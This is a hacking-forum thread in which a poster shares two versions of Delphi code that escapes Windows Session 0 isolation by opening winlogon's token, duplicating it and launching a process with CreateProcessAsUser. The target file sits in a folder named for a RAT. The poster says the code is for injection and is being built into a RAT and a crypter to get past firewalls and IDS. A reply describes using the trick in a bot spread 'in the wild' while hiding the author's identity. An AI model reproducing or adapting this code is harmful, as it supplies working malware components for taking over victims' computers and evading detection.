Thread: Session 0 Isolation Bypass

Bad news: I dont know how metasploit does it despite perusing their src code at length. I have an inelegant method to do it, gathered from various sources....

The following code can only be used in injection... (source code is in delphi since Im trying to add it to OpenShades, but it should translate easily to C++)

Code:

//breaking session 0 isolation
function WTSGetActiveConsoleSessionId:DWORD;stdcall; external 'Kernel32.dll';
function WTSQueryUserToken(SessionID:DWORD;phToken:PDWORD):BOOL; stdcall; external 'wtsapi32.dll' name 'WTSQueryUserToken';
function CreateEnvironmentBlock(var lpEnvironment: Pointer; hToken: THANDLE; bInherit: Boolean): Boolean; stdcall; external 'userenv.dll';
function ProcessIdToSessionId(dwProcessId: DWORD; pSessionId: DWORD): Boolean; stdcall; external 'Kernel32.dll';

function WinlogonSessionFinder( dwSessionId:DWORD ):DWORD;
var
  winlogonPid,winlogonSessId: DWORD;
  hProcess,hSnap: THANDLE;
  procEntry: TProcessEntry32;
begin
  Result := 0;
  hSnap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  if (hSnap <> INVALID_HANDLE_VALUE) then begin

    procEntry.dwSize := sizeof(PROCESSENTRY32);

    winlogonPid := 0;

    if Process32First(hSnap, procEntry) then begin

      while Process32Next(hSnap, procEntry) do
      begin
        if pos('winlogon.exe', procEntry.szExeFile) > 0 then
        begin
          winlogonSessId := 0;
          ProcessIdToSessionId(procEntry.th32ProcessID, DWORD(@winlogonSessId));
          if ProcessIdToSessionId(procEntry.th32ProcessID, DWORD(@winlogonSessId)) then //
          begin
            if winlogonSessId = dwSessionId then
            begin
              winlogonPid := procEntry.th32ProcessID;
              break;
            end;
          end;
        end;
      end;
      Result := winlogonPid;
    end;

  end;
end;

procedure BreakSession0;
var
  pi: PROCESS_INFORMATION;
  si: STARTUPINFO;
  dwSessionId,winlogonPid,dwCreationFlags,winlogonSessId,fool: DWORD;
  hUserToken,hUserTokenDup,hPToken,hProcess,hSnap: THANDLE;
  tp:TOKEN_PRIVILEGES;
  uid : LUID;
  pEnv: Pointer;
  //wth:PHANDLE;

begin
  RevertToSelf;
  dwSessionId := WtsGetActiveConsoleSessionID;
  winlogonPid := WinlogonSessionFinder(dwSessionId);
  if winlogonPid <> 0 then begin
    WTSQueryUserToken(dwSessionId,@hUserToken);
//    dwCreationFlags := NORMAL_PRIORITY_CLASS or CREATE_NEW_CONSOLE;
//    ZeroMemory(@si, sizeof(STARTUPINFO));
//    si.cb := sizeof(STARTUPINFO);
//    si.lpDesktop := 'winsta0\default';
//    ZeroMemory(@pi, sizeof(pi));
    hProcess := OpenProcess(MAXIMUM_ALLOWED,FALSE,winlogonPid);

    if OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY
                    or TOKEN_DUPLICATE or TOKEN_ASSIGN_PRIMARY or $100
                    or TOKEN_READ or TOKEN_WRITE,hPToken) then
    begin
      tp.PrivilegeCount := 1;
      tp.Privileges[0].Luid := INT64(uid);
      tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;

      DuplicateTokenEx(hPToken,MAXIMUM_ALLOWED,nil,SecurityIdentification,TokenPrimary,hUserTokenDup);
      //Adjust Token privilege
      SetTokenInformation(hUserTokenDup,TokenSessionId,Pointer(dwSessionId),sizeof(DWORD));
      AdjustTokenPrivileges(hUserTokenDup, FALSE, tp, sizeof(TOKEN_PRIVILEGES), nil, fool);

      pEnv := nil;

      if CreateEnvironmentBlock(pEnv,hUserTokenDup,TRUE) then
        dwCreationFlags := dwCreationFlags or CREATE_UNICODE_ENVIRONMENT;

//// Launch the process in the client's logon session.

      CreateProcessAsUser(
        hUserTokenDup,            // client's access token
        'C:\Users\<censored>\Desktop\DDAY RAT\OpenShades NET\Server\testServer.exe',              // file to execute
        nil,              // command line
        nil,              // pointer to process SECURITY_ATTRIBUTES
        nil,              // pointer to thread SECURITY_ATTRIBUTES
        FALSE,             // handles are not inheritable
        dwCreationFlags,  // creation flags
        pEnv,              // pointer to new environment block
        nil,              // name of current directory
        si,               // pointer to STARTUPINFO structure
        pi                // receives information about new process
      );

    end;
  end;
end;

If any1 has a better method to bypass session 0 isolation without needing to create a new process, I'd sure like to see it. RAID would benefit from that as well since u can bypass without having to inject and triggering the firewalls and IDS n shit

Edit: after desperately trying to put it into my crypter (I have no fuckin clue when it comes to writing polymorphic wrappers of windows apis. Who knew.)
I have found out that a little over half of the functions in here are unecessary. Rly u just needed to duplciate the token and then createprocessasuser. Good. Now I get to delete all the polymorphic functions that arent working like wtsqueryusertoken or someshit. Haha thats wat I get for c/p w/o experimenting huh?

Code:

//breaking session 0 isolation
function WTSGetActiveConsoleSessionId:DWORD;stdcall; external 'Kernel32.dll';
function ProcessIdToSessionId(dwProcessId: DWORD; pSessionId: DWORD): Boolean; stdcall; external 'Kernel32.dll';

function WinlogonSessionFinder( dwSessionId:DWORD ):DWORD;
var
  winlogonPid,winlogonSessId: DWORD;
  hProcess,hSnap: THANDLE;
  procEntry: TProcessEntry32;
begin
  Result := 0;
  hSnap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  if (hSnap <> INVALID_HANDLE_VALUE) then begin

    procEntry.dwSize := sizeof(PROCESSENTRY32);

    winlogonPid := 0;

    if Process32First(hSnap, procEntry) then begin

      while Process32Next(hSnap, procEntry) do
      begin
        if pos('winlogon.exe', procEntry.szExeFile) > 0 then
        begin
          winlogonSessId := 0;

          if ProcessIdToSessionId(procEntry.th32ProcessID, DWORD(@winlogonSessId)) then //
          begin
            if winlogonSessId = dwSessionId then
            begin
              winlogonPid := procEntry.th32ProcessID;
              break;
            end;
          end;
        end;
      end;
      Result := winlogonPid;
    end;

  end;
end;

procedure BreakSession0;
var
  pi: PROCESS_INFORMATION;
  si: STARTUPINFO;
  dwSessionId,winlogonPid,dwCreationFlags,winlogonSessId,fool: DWORD;
  hUserToken,hUserTokenDup,hPToken,hProcess,hSnap: THANDLE;
  tp:TOKEN_PRIVILEGES;
  uid : LUID;
  pEnv: Pointer;
  //wth:PHANDLE;

begin
  RevertToSelf;
  dwSessionId := WtsGetActiveConsoleSessionID;
  winlogonPid := WinlogonSessionFinder(dwSessionId);
  if winlogonPid <> 0 then begin
    hProcess := OpenProcess(MAXIMUM_ALLOWED,FALSE,winlogonPid);

    if OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY
                    or TOKEN_DUPLICATE or TOKEN_ASSIGN_PRIMARY or $100
                    or TOKEN_READ or TOKEN_WRITE,hPToken) then
    begin
      tp.PrivilegeCount := 1;
      tp.Privileges[0].Luid := INT64(uid);
      tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;

      DuplicateTokenEx(hPToken,MAXIMUM_ALLOWED,nil,SecurityIdentification,TokenPrimary,hUserTokenDup);

        dwCreationFlags := dwCreationFlags or CREATE_UNICODE_ENVIRONMENT;

//// Launch the process in the client's logon session.

      CreateProcessAsUser(
        hUserTokenDup,            // client's access token
        'C:\Users\<censored>\Desktop\DDAY RAT\OpenShades NET\Server\testServer.exe',              // file to execute
        nil,              // command line
        nil,              // pointer to process SECURITY_ATTRIBUTES
        nil,              // pointer to thread SECURITY_ATTRIBUTES
        FALSE,             // handles are not inheritable
        dwCreationFlags,  // creation flags
        nil,              // pointer to new environment block
        nil,              // name of current directory
        si,               // pointer to STARTUPINFO structure
        pi                // receives information about new process
      );

    end;
  end;
end;

Welp back to work... yknow that article didnt exactly teach HOW to write self-modifying windows api wrappers for all cases, like where one function returns a pointer as a variable or someshit.... keep getting access violation at address 0000000000 its some whack shit I tell ya. Fuck! At this rate Imma need to retake ECE 3035 or somethin

just found nice trick that can be done with this method

good share, very interest and useful

Just curious, what nice trick did u find?

Originally Posted by Mr Virut

Just curious, what nice trick did u find?

would be nice to share, but i rather keep it secret...

i don't want any identifying me as coder of my bot when see exe in wild using the trick, so i cant say, but again thanks for the code its very useful